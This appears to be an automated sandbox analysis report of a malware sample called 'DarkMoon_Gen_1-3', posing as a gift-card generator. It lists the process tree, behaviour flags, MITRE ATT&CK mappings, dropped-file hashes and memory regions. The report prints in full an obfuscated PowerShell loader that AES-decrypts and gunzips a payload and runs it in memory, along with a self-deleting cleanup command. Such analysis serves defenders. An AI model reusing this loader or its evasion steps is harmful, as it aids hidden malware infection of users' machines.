C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K uni.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{3b8f9b8f-fba0-4b2f-9e65-118eecd89145}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1df7d0a7-c244-428b-a596-5c8ed35cfd0f}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & exit5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exemain.exe3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c "Dark Moon gen.bat"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping discord.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.paysafecard.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.amazon.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping play.google.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping store.steampowered.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping netflix.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.spotify.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.xbox.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.google.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3592 -s 13122⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3592 -ip 35922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4200 -ip 42002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 4576 -ip 45762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4932 -ip 49322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Pre-OS Boot
1Bootkit
1Hide Artifacts
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B0C.tmp.csvFilesize
41KB
MD56dadedb3de2e1069d3ba497da92275b4
SHA11a7f170b6702ff0e6668d27f50ff038c68c396e2
SHA25647f2178a2850ec29797f45e621c221907d1567dca307161eec8a2ea8c9d34b77
SHA512ec15ae06d80b09d121aa96e54fcbf0150dd86ca6e0f87beab05da44a25028663a3d308cd1ff3fdc9b801031f9506b577761091fa9defad65e99e5b8c0064e16e
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B2C.tmp.txtFilesize
13KB
MD5243472f21248e9813018c18c207ba9d6
SHA1e472e473e252a22915af03e82e47aab3fe06a63b
SHA256f535fee9f9e239ed5b3d9d9c17e25221ae8d1ada98c75af40dc9418a1d1a1368
SHA51267f6993c7e9c3bdd1c8fa13eddb30dde8d558da4651236460f5a80cb3f361f6cd859ff6d0c1168c410dd13a02e15fab04cba0af7ed3d162f1a7a59badb21d486
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE774.tmp.csvFilesize
41KB
MD5fc14d8263aaf11fcce66a07ca73a1ebc
SHA15386494630809d8b5a3e8292d972130484e6ea31
SHA2561dc54bf84f4163cdf4e365d034eb776a2cbff30a657f04fbc22650eb6cfe842c
SHA51282af53cc0291030e9cbcce127465a5e1a453cf42139cb30121f35bd15c5101bad61fb73c953478e9949df0c8eca68ea46e536df7dbb75b951cb811ba81296778
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE794.tmp.txtFilesize
13KB
MD53f95b8e4a1eb63d1c48a3975a1a023c1
SHA1de3b9bacc6e86891fd2314654f975ff289912103
SHA2568a3ba3bb6ee287c1aa77ae36e9c7f1e9af2cc854b83c9afecc5ee92d0c04402b
SHA51212374424bfa5b05ac01aa64d0a76af1f27903cbf61fb79f7586d99ab5c2e8498ac405f2b8cebf7a7dbd19184708ddffa040d53c6a27b721f020027a23b3b674d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERECB6.tmp.csvFilesize
41KB
MD5be8f94a4d74d345783c13da84e8f4b69
SHA1f24582a0e117d08afc1d0376e07c9945332ddd62
SHA256cffaf770e403de5ea927646c3a1bc72b8e728b97a73d383268794bd772c5befe
SHA512db5ae78c21929636cd9ea240938741e348251bf44d22e1b15e73500ea1fe653f153afde3f46eeb9adf532cb36f9fbb02dfeec27c8c57d66ce4281e39c21fb695
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERECD6.tmp.txtFilesize
13KB
MD5a49fcbf808fe0121f3fe5aa0a4b802a2
SHA1ba70d6d065b2c5d844b0bfe8ee9a359f63e11189
SHA25694d45198e72878aca2a061d5ec3cb33c89e5de1c204a577e87d86dd40c541f20
SHA512bbf8e254094bd4a614f7f98800d7b49e85f1a88d430cdaa64500b77678dbd4f46578840a1b8eed327279526f32af746db648b49cbe45b569775ad4d37613b81f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE3E.tmp.csvFilesize
41KB
MD5425702875c1e194947c565cad4fef011
SHA15ad5b892c8fd63bf81d4777e948cb94f8642c8de
SHA256b0e448d6c57b35518134e00204488317f651fd763b6afeef7b03fb1b25dd97e6
SHA5125bf67659e9f4f51ae37215ebbb6f55d50f99e880e95204d60cd0e1248b5cf326f07b2bc75c5bc0fd79541fa16d068a79cfa31a7401dc6065f8339d3048575bed
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE5E.tmp.txtFilesize
13KB
MD54785e29ad93190a53e71793c5ba9e91c
SHA1fd5ec43175765a7dcea2e493dd9e01068625f80f
SHA256fde8d2f4e1b9b00a4e189a536f69566e01bbe8a26664fd8f4d204898bdda7b79
SHA512afe7e9876a62b12de288ec7e4f1d3db023451d380cbb1663275793710df5edaa0c5367b502bbc6a06f39814e40622f1b42164793434aa9a521e1ba9b15a43a43
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.batFilesize
35KB
MD5c153581143e0b72cecae38a393991a4b
SHA1da43d03b19765594ff124415a060551343823a39
SHA2562fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
SHA5128c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dx4lkurs.dox.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
memory/316-105-0x000001478B340000-0x000001478B367000-memory.dmpFilesize
156KB
-
memory/316-106-0x00007FFD62630000-0x00007FFD62640000-memory.dmpFilesize
64KB
-
memory/616-95-0x000001ECD06A0000-0x000001ECD06C7000-memory.dmpFilesize
156KB
-
memory/616-101-0x00007FFD62630000-0x00007FFD62640000-memory.dmpFilesize
64KB
-
memory/616-94-0x000001ECD0670000-0x000001ECD0692000-memory.dmpFilesize
136KB
-
memory/672-103-0x00007FFD62630000-0x00007FFD62640000-memory.dmpFilesize
64KB
-
memory/672-97-0x000001E6D8D40000-0x000001E6D8D67000-memory.dmpFilesize
156KB
-
memory/744-112-0x00007FFD62630000-0x00007FFD62640000-memory.dmpFilesize
64KB
-
memory/744-111-0x000001B5A8FD0000-0x000001B5A8FF7000-memory.dmpFilesize
156KB
-
memory/960-108-0x0000020887F10000-0x0000020887F37000-memory.dmpFilesize
156KB
-
memory/960-109-0x00007FFD62630000-0x00007FFD62640000-memory.dmpFilesize
64KB
-
memory/1064-72-0x0000026D7D3E0000-0x0000026D7D5A2000-memory.dmpFilesize
1.8MB
-
memory/1064-84-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmpFilesize
2.0MB
-
memory/1064-61-0x0000026D78B70000-0x0000026D78B92000-memory.dmpFilesize
136KB
-
memory/1064-62-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmpFilesize
2.0MB
-
memory/1064-70-0x0000026D7CB60000-0x0000026D7CBB0000-memory.dmpFilesize
320KB
-
memory/1064-71-0x0000026D7CC70000-0x0000026D7CD22000-memory.dmpFilesize
712KB
-
memory/1064-59-0x0000026D7C0A0000-0x0000026D7C4DE000-memory.dmpFilesize
4.2MB
-
memory/1064-82-0x0000026D7CBB0000-0x0000026D7CBEC000-memory.dmpFilesize
240KB
-
memory/1064-83-0x0000026D7CB10000-0x0000026D7CB5E000-memory.dmpFilesize
312KB
-
memory/1064-55-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmpFilesize
2.0MB
-
memory/1064-85-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmpFilesize
760KB
-
memory/1064-86-0x0000026D7CBF0000-0x0000026D7CC26000-memory.dmpFilesize
216KB
-
memory/1064-57-0x0000026D7B150000-0x0000026D7B6D6000-memory.dmpFilesize
5.5MB
-
memory/1064-58-0x0000026D7B8D0000-0x0000026D7C09A000-memory.dmpFilesize
7.8MB
-
memory/1064-56-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmpFilesize
760KB
-
memory/1064-60-0x0000026D7C4E0000-0x0000026D7C592000-memory.dmpFilesize
712KB
-
memory/2888-30-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/2888-29-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/3236-114-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3236-91-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3924-23-0x0000025A66F30000-0x0000025A66F86000-memory.dmpFilesize
344KB
-
memory/3924-20-0x0000025A66430000-0x0000025A66E80000-memory.dmpFilesize
10.3MB
-
memory/3924-17-0x0000025A4BA40000-0x0000025A4BA64000-memory.dmpFilesize
144KB
-
memory/3924-24-0x0000025A66F90000-0x0000025A66FE8000-memory.dmpFilesize
352KB
-
memory/3924-19-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmpFilesize
760KB
-
memory/3924-26-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmpFilesize
2.0MB
-
memory/3924-28-0x0000025A4BA80000-0x0000025A4BA8A000-memory.dmpFilesize
40KB
-
memory/3924-25-0x0000025A4BA60000-0x0000025A4BA82000-memory.dmpFilesize
136KB
-
memory/3924-16-0x0000025A65EB0000-0x0000025A65ED2000-memory.dmpFilesize
136KB
-
memory/3924-18-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmpFilesize
2.0MB
-
memory/3924-22-0x0000025A66E80000-0x0000025A66F26000-memory.dmpFilesize
664KB
-
memory/4344-32-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/4344-31-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/4976-89-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmpFilesize
2.0MB
-
memory/4976-87-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4976-88-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4976-92-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4976-90-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmpFilesize
760KB